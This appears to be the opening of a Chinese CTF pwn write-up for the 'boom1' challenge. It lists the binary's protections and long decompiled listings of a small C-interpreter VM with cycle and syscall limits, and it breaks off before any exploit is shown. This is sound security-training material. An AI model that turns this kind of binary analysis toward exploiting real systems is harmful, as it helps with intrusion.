目录
boom1
Description:
nc 182.92.73.10 24573
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
main 函数如下:
size_t __fastcall main(__int64 a1, char **a2, char **a3) { size_t result; // rax void *v4; // rdi signed __int64 v5; // rax signed __int64 v6; // rax void *v7; // rsi __int64 v8; // rax __int64 v9; // rax signed __int64 *v10; // ST28_8 signed __int64 *v11; // ST60_8 signed __int64 *v12; // rax signed __int64 *v13; // rax signed __int64 *v14; // rax signed __int64 v15; // rax signed __int64 v16; // rax signed __int64 *v17; // ST28_8 signed __int64 *v18; // rax signed __int64 *v19; // rax signed __int64 v20; // ST28_8 signed __int64 **v21; // rax signed __int64 **v22; // rax signed __int64 *v23; // rax _BYTE *v24; // rax signed __int64 *v25; // rax signed __int64 *v26; // rax signed __int64 *v27; // rax signed __int64 *v28; // rax signed __int64 *v29; // rax signed __int64 *v30; // rax signed __int64 *v31; // rax signed __int64 *v32; // rax signed __int64 *v33; // rax signed __int64 *v34; // rax signed __int64 *v35; // rax signed __int64 *v36; // rax signed __int64 *v37; // rax signed __int64 *v38; // rax signed __int64 *v39; // rax signed __int64 *v40; // rax __int64 v41; // rax __int64 v42; // rax __int64 v43; // rax __int64 v44; // rax __int64 v45; // rax __int64 v46; // rax __int64 v47; // rax __int64 v48; // rax signed __int64 v49; // ST60_8 __int64 v50; // rax __int64 v51; // rax char **v52; // [rsp+0h] [rbp-70h] signed __int64 v53; // [rsp+8h] [rbp-68h] _BOOL8 v54; // [rsp+10h] [rbp-60h] __int64 v55; // [rsp+18h] [rbp-58h] signed __int64 v56; // [rsp+18h] [rbp-58h] __int64 v57; // [rsp+18h] [rbp-58h] signed __int64 *v58; // [rsp+20h] [rbp-50h] char *v59; // [rsp+28h] [rbp-48h] signed __int64 *v60; // [rsp+28h] [rbp-48h] signed __int64 *v61; // [rsp+30h] [rbp-40h] signed __int64 v62; // [rsp+38h] [rbp-38h] __int64 v63; // [rsp+40h] [rbp-30h] signed __int64 v64; // [rsp+48h] [rbp-28h] signed __int64 v65; // [rsp+48h] [rbp-28h] ssize_t v66; // [rsp+48h] [rbp-28h] __int64 v67; // [rsp+48h] [rbp-28h] __int64 v68; // [rsp+48h] [rbp-28h] signed __int64 v69; // [rsp+48h] [rbp-28h] signed __int64 v70; // [rsp+48h] [rbp-28h] __int64 v71; // [rsp+58h] [rbp-18h] setbuf(stdout, 0LL); setbuf(stdin, 0LL); setbuf(stderr, 0LL); v53 = a1 - 1; v52 = a2 + 1; s = malloc(0x40000uLL); if ( !s ) { printf("could not malloc(%d) symbol area\n", 0x40000LL, v52, v53); return -1LL; } qword_206088 = malloc(0x40000uLL); qword_206068 = (__int64)qword_206088; if ( !qword_206088 ) { printf("could not malloc(%d) text area\n", 0x40000LL, v52, v53); return -1LL; } qword_206080 = malloc(0x40000uLL); if ( !qword_206080 ) { printf("could not malloc(%d) data area\n", 0x40000LL, v52, v53); return -1LL; } v59 = (char *)malloc(0x40000uLL); if ( !v59 ) { printf("could not malloc(%d) stack area\n", 0x40000LL, v52, v53); return -1LL; } memset(s, 0, 0x40000uLL); memset(qword_206088, 0, 0x40000uLL); v4 = qword_206080; memset(qword_206080, 0, 0x40000uLL); buf = "char else enum if int return sizeof while open read write close puts malloc free printf memset memcmp exit void main"; v64 = 134LL; while ( v64 <= 141 ) { ((void (*)(void))sub_B70)(); v5 = v64++; *(_QWORD *)qword_2060B8 = v5; } v65 = 30LL; while ( v65 <= 40 ) { ((void (*)(void))sub_B70)(); *(_QWORD *)(qword_2060B8 + 24) = 130LL; *(_QWORD *)(qword_2060B8 + 32) = 1LL; v6 = v65++; *(_QWORD *)(qword_2060B8 + 40) = v6; } sub_B70(v4, 0LL); *(_QWORD *)qword_2060B8 = 134LL; sub_B70(v4, 0LL); v71 = qword_2060B8; buf = malloc(0x40000uLL); qword_2060A0 = (__int64)buf; if ( !buf ) { printf("could not malloc(%d) source area\n", 0x40000LL, v52, v53); return -1LL; } puts("I'm living..."); v7 = buf; v66 = read(0, buf, 0x3FFFFuLL); if ( v66 <= 0 ) { printf("read() returned %d\n", v66, v52, v53); return -1LL; } *((_BYTE *)buf + v66) = 0; qword_206098 = 1LL; sub_B70(0LL, v7); while ( qword_206070 ) { v54 = 1LL; switch ( qword_206070 ) { case 138LL: sub_B70(0LL, v7); break; case 134LL: sub_B70(0LL, v7); v54 = 0LL; break; case 136LL: sub_B70(0LL, v7); if ( qword_206070 != 123 ) sub_B70(0LL, v7); if ( qword_206070 == 123 ) { sub_B70(0LL, v7); v67 = 0LL; while ( 1 ) { if ( qword_206070 == 125 ) { sub_B70(0LL, v7); goto LABEL_90; } if ( qword_206070 != 133 ) { printf("%d: bad enum identifier %d\n", qword_206098, qword_206070, v52, v53); return -1LL; } sub_B70(0LL, v7); if ( qword_206070 == 142 ) { sub_B70(0LL, v7); if ( qword_206070 != 128 ) { printf("%d: bad enum initializer\n", qword_206098, v52, v53); return -1LL; } v67 = qword_2060A8; sub_B70(0LL, v7); } *(_QWORD *)(qword_2060B8 + 24) = 128LL; *(_QWORD *)(qword_2060B8 + 32) = 1LL; v8 = v67++; *(_QWORD *)(qword_2060B8 + 40) = v8; if ( qword_206070 == 44 ) sub_B70(0LL, v7); } } break; } LABEL_90: while ( qword_206070 != 59 && qword_206070 != 125 ) { v55 = v54; while ( qword_206070 == 159 ) { sub_B70(0LL, v7); v55 += 2LL; } if ( qword_206070 != 133 ) { printf("%d: bad global declaration\n", qword_206098, v52, v53); return -1LL; } if ( *(_QWORD *)(qword_2060B8 + 24) ) { printf("%d: duplicate global definition\n", qword_206098, v52, v53); return -1LL; } sub_B70(0LL, v7); *(_QWORD *)(qword_2060B8 + 32) = v55; if ( qword_206070 == 40 ) { *(_QWORD *)(qword_2060B8 + 24) = 129LL; *(_QWORD *)(qword_2060B8 + 40) = (char *)qword_206088 + 8; sub_B70(0LL, v7); v68 = 0LL; while ( qword_206070 != 41 ) { v56 = 1LL; if ( qword_206070 == 138 ) { sub_B70(0LL, v7); } else if ( qword_206070 == 134 ) { sub_B70(0LL, v7); v56 = 0LL; } while ( qword_206070 == 159 ) { sub_B70(0LL, v7); v56 += 2LL; } if ( qword_206070 != 133 ) { printf("%d: bad parameter declaration\n", qword_206098, v52, v53); return -1LL; } if ( *(_QWORD *)(qword_2060B8 + 24) == 132LL ) { printf("%d: duplicate parameter definition\n", qword_206098, v52, v53); return -1LL; } *(_QWORD *)(qword_2060B8 + 48) = *(_QWORD *)(qword_2060B8 + 24); *(_QWORD *)(qword_2060B8 + 24) = 132LL; *(_QWORD *)(qword_2060B8 + 56) = *(_QWORD *)(qword_2060B8 + 32); *(_QWORD *)(qword_2060B8 + 32) = v56; *(_QWORD *)(qword_2060B8 + 64) = *(_QWORD *)(qword_2060B8 + 40); v9 = v68++; *(_QWORD *)(qword_2060B8 + 40) = v9; sub_B70(0LL, v7); if ( qword_206070 == 44 ) sub_B70(0LL, v7); } sub_B70(0LL, v7); if ( qword_206070 != 123 ) { printf("%d: bad function definition\n", qword_206098, v52, v53); return -1LL; } v69 = v68 + 1; qword_206090 = v69; sub_B70(0LL, v7); while ( qword_206070 == 138 || qword_206070 == 134 ) { v54 = qword_206070 == 138; sub_B70(0LL, v7); while ( qword_206070 != 59 ) { v57 = v54; while ( qword_206070 == 159 ) { sub_B70(0LL, v7); v57 += 2LL; } if ( qword_206070 != 133 ) { printf("%d: bad local declaration\n", qword_206098, v52, v53); return -1LL; } if ( *(_QWORD *)(qword_2060B8 + 24) == 132LL ) { printf("%d: duplicate local definition\n", qword_206098, v52, v53); return -1LL; } *(_QWORD *)(qword_2060B8 + 48) = *(_QWORD *)(qword_2060B8 + 24); *(_QWORD *)(qword_2060B8 + 24) = 132LL; *(_QWORD *)(qword_2060B8 + 56) = *(_QWORD *)(qword_2060B8 + 32); *(_QWORD *)(qword_2060B8 + 32) = v57; *(_QWORD *)(qword_2060B8 + 64) = *(_QWORD *)(qword_2060B8 + 40); *(_QWORD *)(qword_2060B8 + 40) = ++v69; sub_B70(0LL, v7); if ( qword_206070 == 44 ) sub_B70(0LL, v7); } sub_B70(0LL, v7); } qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 6LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = v69 - qword_206090; while ( qword_206070 != 125 ) sub_3457(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 8LL; for ( qword_2060B8 = (__int64)s; *(_QWORD *)qword_2060B8; qword_2060B8 += 72LL ) { if ( *(_QWORD *)(qword_2060B8 + 24) == 132LL ) { *(_QWORD *)(qword_2060B8 + 24) = *(_QWORD *)(qword_2060B8 + 48); *(_QWORD *)(qword_2060B8 + 32) = *(_QWORD *)(qword_2060B8 + 56); *(_QWORD *)(qword_2060B8 + 40) = *(_QWORD *)(qword_2060B8 + 64); } } } else { *(_QWORD *)(qword_2060B8 + 24) = 131LL; *(_QWORD *)(qword_2060B8 + 40) = qword_206080; qword_206080 = (char *)qword_206080 + 8; } if ( qword_206070 == 44 ) sub_B70(0LL, v7); } sub_B70(0LL, v7); } v58 = *(signed __int64 **)(v71 + 40); if ( v58 ) { if ( qword_206060 ) { result = 0LL; } else { v10 = (signed __int64 *)(v59 + 0x40000); v61 = v10; --v10; *v10 = 40LL; --v10; *v10 = 13LL; v11 = v10; --v10; *v10 = v53; --v10; *v10 = (signed __int64)v52; v60 = v10 - 1; *v60 = (signed __int64)v11; v63 = 0LL; while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { v12 = v58; ++v58; v70 = *v12; if ( ++v63 > 100 ) { puts("NOTALLOW"); exit(0); } if ( qword_206058 ) { printf( "%d> %.4s", v63, &aLeaImmJmpJsrBz_0[5 * v70], v52, v53); if ( v70 > 7 ) putchar(10); else printf(" %d\n", *v58); } if ( v70 ) break; v13 = v58; ++v58; v62 = (signed __int64)&v61[*v13]; } if ( v70 != 1 ) break; v14 = v58; ++v58; v62 = *v14; } if ( v70 != 2 ) break; v58 = (signed __int64 *)*v58; } if ( v70 != 3 ) break; --v60; *v60 = (signed __int64)(v58 + 1); v58 = (signed __int64 *)*v58; } if ( v70 != 4 ) break; if ( v62 ) v15 = (signed __int64)(v58 + 1); else v15 = *v58; v58 = (signed __int64 *)v15; } if ( v70 != 5 ) break; if ( v62 ) v16 = *v58; else v16 = (signed __int64)(v58 + 1); v58 = (signed __int64 *)v16; } if ( v70 != 6 ) break; v17 = v60 - 1; *v17 = (signed __int64)v61; v61 = v17; v18 = v58; ++v58; v60 = &v17[-*v18]; } if ( v70 != 7 ) break; v19 = v58; ++v58; v60 += *v19; } if ( v70 != 8 ) break; v20 = (signed __int64)(v61 + 1); v61 = (signed __int64 *)*v61; v21 = (signed __int64 **)v20; v60 = (signed __int64 *)(v20 + 8); v58 = *v21; } if ( v70 != 9 ) break; v62 = *(_QWORD *)v62; } if ( v70 != 10 ) break; v62 = *(char *)v62; } if ( v70 != 11 ) break; v22 = (signed __int64 **)v60; ++v60; **v22 = v62; } if ( v70 != 12 ) break; v23 = v60; ++v60; v24 = (_BYTE *)*v23; *v24 = v62; v62 = (char)*v24; } if ( v70 != 13 ) break; --v60; *v60 = v62; } if ( v70 != 14 ) break; v25 = v60; ++v60; v62 |= *v25; } if ( v70 != 15 ) break; v26 = v60; ++v60; v62 ^= *v26; } if ( v70 != 16 ) break; v27 = v60; ++v60; v62 &= *v27; } if ( v70 != 17 ) break; v28 = v60; ++v60; v62 = *v28 == v62; } if ( v70 != 18 ) break; v29 = v60; ++v60; v62 = *v29 != v62; } if ( v70 != 19 ) break; v30 = v60; ++v60; v62 = *v30 < v62; } if ( v70 != 20 ) break; v31 = v60; ++v60; v62 = *v31 > v62; } if ( v70 != 21 ) break; v32 = v60; ++v60; v62 = *v32 <= v62; } if ( v70 != 22 ) break; v33 = v60; ++v60; v62 = *v33 >= v62; } if ( v70 != 23 ) break; v34 = v60; ++v60; v62 = *v34 << v62; } if ( v70 != 24 ) break; v35 = v60; ++v60; v62 = *v35 >> v62; } if ( v70 != 25 ) break; v36 = v60; ++v60; v62 += *v36; } if ( v70 != 26 ) break; v37 = v60; ++v60; v62 = *v37 - v62; } if ( v70 != 27 ) break; v38 = v60; ++v60; v62 *= *v38; } if ( v70 != 28 ) break; v39 = v60; ++v60; v62 = *v39 / v62; } if ( v70 != 29 ) break; v40 = v60; ++v60; v62 = *v40 % v62; } if ( v70 != 30 ) break; v41 = qword_206010--; if ( v41 != 1 ) { puts("NOTALLOW"); exit(0); } v62 = open((const char *)v60[1], *v60, v52, v53); } if ( v70 != 31 ) break; v42 = qword_206010--; if ( v42 != 1 ) { puts("NOTALLOW"); exit(0); } v62 = read(v60[2], (void *)v60[1], *v60); } if ( v70 != 32 ) break; v43 = qword_206010--; if ( v43 != 1 ) { puts("NOTALLOW"); exit(0); } v62 = write(v60[2], (const void *)v60[1], *v60); } if ( v70 != 33 ) break; v44 = qword_206010--; if ( v44 != 1 ) { puts("NOTALLOW"); exit(0); } v62 = close(*v60); } if ( v70 != 34 ) break; v45 = qword_206010--; if ( v45 != 1 ) { puts("NOTALLOW"); exit(0); } puts((const char *)*v60); } if ( v70 != 35 ) break; v46 = qword_206010--; if ( v46 != 1 ) { puts("NOTALLOW"); exit(0); } v62 = (signed __int64)malloc(*v60); } if ( v70 != 36 ) break; v47 = qword_206010--; if ( v47 != 1 ) { puts("NOTALLOW"); exit(0); } free((void *)*v60); } if ( v70 != 37 ) break; v48 = qword_206010--; if ( v48 != 1 ) { puts("NOTALLOW"); exit(0); } v49 = (signed __int64)&v60[v58[1]]; v62 = printf( *(const char **)(v49 - 8), *(_QWORD *)(v49 - 16), *(_QWORD *)(v49 - 24), *(_QWORD *)(v49 - 32), *(_QWORD *)(v49 - 40), *(_QWORD *)(v49 - 48), v52, v53); } if ( v70 != 38 ) break; v50 = qword_206010--; if ( v50 != 1 ) { puts("NOTALLOW"); exit(0); } v62 = (signed __int64)memset((void *)v60[2], v60[1], *v60); } if ( v70 != 39 ) break; v51 = qword_206010--; if ( v51 != 1 ) { puts("NOTALLOW"); exit(0); } v62 = memcmp((const void *)v60[2], (const void *)v60[1], *v60); } if ( v70 == 40 ) { printf("exit(%d) cycle = %d\n", *v60, v63, v52, v53); result = *v60; } else { printf("unknown instruction = %d! cycle = %d\n", v70, v63, v52, v53); result = -1LL; } } } else { puts("main() not defined"); result = -1LL; } return result; }
sub_B70 函数如下:
unsigned __int64 sub_B70() { char *v0; // rax __int64 *v1; // rax char *v2; // rax signed __int64 v3; // rax char *v4; // rax char *v5; // rax char *v6; // rax _BYTE *v7; // rax char *s2; // [rsp+0h] [rbp-10h] void *s2a; // [rsp+0h] [rbp-10h] unsigned __int64 v11; // [rsp+8h] [rbp-8h] v11 = __readfsqword(0x28u); while ( 1 ) { qword_206070 = *(char *)buf; if ( !qword_206070 ) break; buf = (char *)buf + 1; if ( qword_206070 == 10 ) { if ( qword_206060 ) { printf("%d: %.*s", qword_206098, (char *)buf - qword_2060A0, qword_2060A0); qword_2060A0 = (__int64)buf; while ( qword_206068 < (unsigned __int64)qword_206088 ) { qword_206068 += 8LL; printf("%8.4s", &aLeaImmJmpJsrBz[5 * *(_QWORD *)qword_206068]); if ( *(_QWORD *)qword_206068 > 7LL ) { putchar(10); } else { qword_206068 += 8LL; printf(" %d\n", *(_QWORD *)qword_206068); } } } ++qword_206098; } else if ( qword_206070 == 35 ) { while ( *(_BYTE *)buf && *(_BYTE *)buf != 10 ) buf = (char *)buf + 1; } else { if ( qword_206070 > 96 && qword_206070 <= 122 || qword_206070 > 64 && qword_206070 <= 90 || qword_206070 == 95 ) { s2 = (char *)buf - 1; while ( *(_BYTE *)buf > 96 && *(_BYTE *)buf <= 122 || *(_BYTE *)buf > 64 && *(_BYTE *)buf <= 90 || *(_BYTE *)buf > 47 && *(_BYTE *)buf <= 57 || *(_BYTE *)buf == 95 ) { v0 = (char *)buf; buf = (char *)buf + 1; qword_206070 = 147 * qword_206070 + *v0; } qword_206070 = (qword_206070 << 6) + (_BYTE *)buf - s2; for ( qword_2060B8 = (__int64)s; *(_QWORD *)qword_2060B8; qword_2060B8 += 72LL ) { if ( *(_QWORD *)(qword_2060B8 + 8) == qword_206070 && !memcmp(*(const void **)(qword_2060B8 + 16), s2, (_BYTE *)buf - s2) ) { qword_206070 = *(_QWORD *)qword_2060B8; return __readfsqword(0x28u) ^ v11; } } *(_QWORD *)(qword_2060B8 + 16) = s2; *(_QWORD *)(qword_2060B8 + 8) = qword_206070; v1 = (__int64 *)qword_2060B8; *(_QWORD *)qword_2060B8 = 133LL; qword_206070 = *v1; return __readfsqword(0x28u) ^ v11; } if ( qword_206070 > 47 && qword_206070 <= 57 ) { qword_2060A8 = qword_206070 - 48; if ( qword_206070 == 48 ) { if ( *(_BYTE *)buf != 120 && *(_BYTE *)buf != 88 ) { while ( *(_BYTE *)buf > 47 && *(_BYTE *)buf <= 55 ) { v4 = (char *)buf; buf = (char *)buf + 1; qword_2060A8 = 8 * qword_2060A8 + *v4 - 48; } } else { while ( 1 ) { buf = (char *)buf + 1; qword_206070 = *(char *)buf; if ( !qword_206070 || (qword_206070 <= 47 || qword_206070 > 57) && (qword_206070 <= 96 || qword_206070 > 102) && (qword_206070 <= 64 || qword_206070 > 70) ) { break; } if ( qword_206070 <= 64 ) v3 = 0LL; else v3 = 9LL; qword_2060A8 = (qword_206070 & 0xF) + 16 * qword_2060A8 + v3; } } } else { while ( *(_BYTE *)buf > 47 && *(_BYTE *)buf <= 57 ) { v2 = (char *)buf; buf = (char *)buf + 1; qword_2060A8 = 10 * qword_2060A8 + *v2 - 48; } } qword_206070 = 128LL; return __readfsqword(0x28u) ^ v11; } switch ( qword_206070 ) { case 47LL: if ( *(_BYTE *)buf != 47 ) { qword_206070 = 160LL; return __readfsqword(0x28u) ^ v11; } for ( buf = (char *)buf + 1; *(_BYTE *)buf && *(_BYTE *)buf != 10; buf = (char *)buf + 1 ) ; break; case 39LL: case 34LL: s2a = qword_206080; while ( *(_BYTE *)buf && *(char *)buf != qword_206070 ) { v5 = (char *)buf; buf = (char *)buf + 1; qword_2060A8 = *v5; if ( qword_2060A8 == 92 ) { v6 = (char *)buf; buf = (char *)buf + 1; qword_2060A8 = *v6; if ( qword_2060A8 == 110 ) qword_2060A8 = 10LL; } if ( qword_206070 == 34 ) { v7 = qword_206080; qword_206080 = (char *)qword_206080 + 1; *v7 = qword_2060A8; } } buf = (char *)buf + 1; if ( qword_206070 == 34 ) qword_2060A8 = (__int64)s2a; else qword_206070 = 128LL; return __readfsqword(0x28u) ^ v11; case 61LL: if ( *(_BYTE *)buf == 61 ) { buf = (char *)buf + 1; qword_206070 = 149LL; } else { qword_206070 = 142LL; } return __readfsqword(0x28u) ^ v11; case 43LL: if ( *(_BYTE *)buf == 43 ) { buf = (char *)buf + 1; qword_206070 = 162LL; } else { qword_206070 = 157LL; } return __readfsqword(0x28u) ^ v11; case 45LL: if ( *(_BYTE *)buf == 45 ) { buf = (char *)buf + 1; qword_206070 = 163LL; } else { qword_206070 = 158LL; } return __readfsqword(0x28u) ^ v11; case 33LL: if ( *(_BYTE *)buf == 61 ) { buf = (char *)buf + 1; qword_206070 = 150LL; } return __readfsqword(0x28u) ^ v11; case 60LL: if ( *(_BYTE *)buf == 61 ) { buf = (char *)buf + 1; qword_206070 = 153LL; } else if ( *(_BYTE *)buf == 60 ) { buf = (char *)buf + 1; qword_206070 = 155LL; } else { qword_206070 = 151LL; } return __readfsqword(0x28u) ^ v11; case 62LL: if ( *(_BYTE *)buf == 61 ) { buf = (char *)buf + 1; qword_206070 = 154LL; } else if ( *(_BYTE *)buf == 62 ) { buf = (char *)buf + 1; qword_206070 = 156LL; } else { qword_206070 = 152LL; } return __readfsqword(0x28u) ^ v11; case 124LL: if ( *(_BYTE *)buf == 124 ) { buf = (char *)buf + 1; qword_206070 = 144LL; } else { qword_206070 = 146LL; } return __readfsqword(0x28u) ^ v11; case 38LL: if ( *(_BYTE *)buf == 38 ) { buf = (char *)buf + 1; qword_206070 = 145LL; } else { qword_206070 = 148LL; } return __readfsqword(0x28u) ^ v11; case 94LL: qword_206070 = 147LL; return __readfsqword(0x28u) ^ v11; case 37LL: qword_206070 = 161LL; return __readfsqword(0x28u) ^ v11; case 42LL: qword_206070 = 159LL; return __readfsqword(0x28u) ^ v11; case 91LL: qword_206070 = 164LL; return __readfsqword(0x28u) ^ v11; case 63LL: qword_206070 = 143LL; return __readfsqword(0x28u) ^ v11; case 126LL: case 59LL: case 123LL: case 125LL: case 40LL: case 41LL: case 93LL: case 44LL: case 58LL: return __readfsqword(0x28u) ^ v11; } } } return __readfsqword(0x28u) ^ v11; }
sub_3457 函数如下:
unsigned __int64 sub_3457() { _QWORD *v0; // ST08_8 _QWORD *v2; // [rsp+8h] [rbp-18h] char *v3; // [rsp+10h] [rbp-10h] unsigned __int64 v4; // [rsp+18h] [rbp-8h] v4 = __readfsqword(0x28u); switch ( qword_206070 ) { case 137LL: sub_B70(); if ( qword_206070 != 40 ) { printf("%d: open paren expected\n", qword_206098); exit(-1); } sub_B70(); sub_16CB(142LL); if ( qword_206070 != 41 ) { printf("%d: close paren expected\n", qword_206098); exit(-1); } sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 4LL; qword_206088 = (char *)qword_206088 + 8; v2 = qword_206088; sub_3457(142LL); if ( qword_206070 == 135 ) { *v2 = (char *)qword_206088 + 24; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 2LL; qword_206088 = (char *)qword_206088 + 8; v2 = qword_206088; sub_B70(); sub_3457(142LL); } *v2 = (char *)qword_206088 + 8; break; case 141LL: sub_B70(); v3 = (char *)qword_206088 + 8; if ( qword_206070 != 40 ) { printf("%d: open paren expected\n", qword_206098); exit(-1); } sub_B70(); sub_16CB(142LL); if ( qword_206070 != 41 ) { printf("%d: close paren expected\n", qword_206098); exit(-1); } sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 4LL; qword_206088 = (char *)qword_206088 + 8; v0 = qword_206088; sub_3457(142LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 2LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = v3; *v0 = (char *)qword_206088 + 8; break; case 139LL: sub_B70(); if ( qword_206070 != 59 ) sub_16CB(142LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 8LL; if ( qword_206070 != 59 ) { printf("%d: semicolon expected\n", qword_206098); exit(-1); } sub_B70(); break; case 123LL: sub_B70(); while ( qword_206070 != 125 ) ((void (*)(void))sub_3457)(); sub_B70(); break; case 59LL: sub_B70(); break; default: sub_16CB(142LL); if ( qword_206070 != 59 ) { printf("%d: semicolon expected\n", qword_206098); exit(-1); } sub_B70(); break; } return __readfsqword(0x28u) ^ v4; }
sub_16CB 函数如下:
unsigned __int64 __fastcall sub_16CB(__int64 a1) { signed __int64 v1; // rdx signed __int64 v2; // rdx signed __int64 v3; // rdx signed __int64 v4; // rdx signed __int64 v5; // rdx signed __int64 v6; // rdx signed __int64 v7; // rdx _QWORD *v8; // ST20_8 _QWORD *v9; // ST20_8 _QWORD *v10; // ST20_8 signed __int64 v11; // rdx signed __int64 v12; // rdx signed __int64 v13; // rdx signed __int64 v14; // rdx signed __int64 v15; // rdx signed __int64 v16; // rdx __int64 v18; // [rsp+18h] [rbp-18h] __int64 v19; // [rsp+18h] [rbp-18h] __int64 v20; // [rsp+18h] [rbp-18h] signed __int64 v21; // [rsp+18h] [rbp-18h] _QWORD *v22; // [rsp+20h] [rbp-10h] _QWORD *v23; // [rsp+20h] [rbp-10h] unsigned __int64 v24; // [rsp+28h] [rbp-8h] v24 = __readfsqword(0x28u); if ( !qword_206070 ) { printf("%d: unexpected eof in expression\n", qword_206098); exit(-1); } switch ( qword_206070 ) { case 128LL: qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = qword_2060A8; sub_B70(); qword_206078 = 1LL; break; case 34LL: qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = qword_2060A8; sub_B70(); while ( qword_206070 == 34 ) sub_B70(); qword_206080 = (void *)(((unsigned __int64)qword_206080 + 8) & 0xFFFFFFFFFFFFFFF8LL); qword_206078 = 2LL; break; case 140LL: sub_B70(); if ( qword_206070 != 40 ) { printf("%d: open paren expected in sizeof\n", qword_206098); exit(-1); } sub_B70(); qword_206078 = 1LL; if ( qword_206070 == 138 ) { sub_B70(); } else if ( qword_206070 == 134 ) { sub_B70(); qword_206078 = 0LL; } while ( qword_206070 == 159 ) { sub_B70(); qword_206078 += 2LL; } if ( qword_206070 != 41 ) { printf("%d: close paren expected in sizeof\n", qword_206098); exit(-1); } sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; if ( qword_206078 ) v1 = 8LL; else v1 = 1LL; *(_QWORD *)qword_206088 = v1; qword_206078 = 1LL; break; case 133LL: v22 = (_QWORD *)qword_2060B8; sub_B70(); if ( qword_206070 == 40 ) { sub_B70(); v18 = 0LL; while ( qword_206070 != 41 ) { sub_16CB(142LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; ++v18; if ( qword_206070 == 44 ) sub_B70(); } sub_B70(); if ( v22[3] == 130LL ) { qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = v22[5]; } else { if ( v22[3] != 129LL ) { printf("%d: bad function call\n", qword_206098); exit(-1); } qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 3LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = v22[5]; } if ( v18 ) { qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 7LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = v18; } qword_206078 = v22[4]; } else if ( v22[3] == 128LL ) { qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = v22[5]; qword_206078 = 1LL; } else { if ( v22[3] == 132LL ) { qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 0LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = qword_206090 - v22[5]; } else { if ( v22[3] != 131LL ) { printf("%d: undefined variable\n", qword_206098); exit(-1); } qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = v22[5]; } qword_206088 = (char *)qword_206088 + 8; qword_206078 = v22[4]; if ( qword_206078 ) v2 = 9LL; else v2 = 10LL; *(_QWORD *)qword_206088 = v2; } break; case 40LL: sub_B70(); if ( qword_206070 != 138 && qword_206070 != 134 ) { sub_16CB(142LL); if ( qword_206070 != 41 ) { printf("%d: close paren expected\n", qword_206098); exit(-1); } sub_B70(); } else { v19 = qword_206070 == 138; sub_B70(); while ( qword_206070 == 159 ) { sub_B70(); v19 += 2LL; } if ( qword_206070 != 41 ) { printf("%d: bad cast\n", qword_206098); exit(-1); } sub_B70(); sub_16CB(162LL); qword_206078 = v19; } break; case 159LL: sub_B70(); sub_16CB(162LL); if ( qword_206078 <= 1 ) { printf("%d: bad dereference\n", qword_206098); exit(-1); } qword_206078 -= 2LL; qword_206088 = (char *)qword_206088 + 8; if ( qword_206078 ) v3 = 9LL; else v3 = 10LL; *(_QWORD *)qword_206088 = v3; break; case 148LL: sub_B70(); sub_16CB(162LL); if ( *(_QWORD *)qword_206088 != 10LL && *(_QWORD *)qword_206088 != 9LL ) { printf("%d: bad address-of\n", qword_206098); exit(-1); } qword_206088 = (char *)qword_206088 - 8; qword_206078 += 2LL; break; case 33LL: sub_B70(); sub_16CB(162LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 0LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 17LL; qword_206078 = 1LL; break; case 126LL: sub_B70(); sub_16CB(162LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = -1LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 15LL; qword_206078 = 1LL; break; case 157LL: sub_B70(); sub_16CB(162LL); qword_206078 = 1LL; break; case 158LL: sub_B70(); 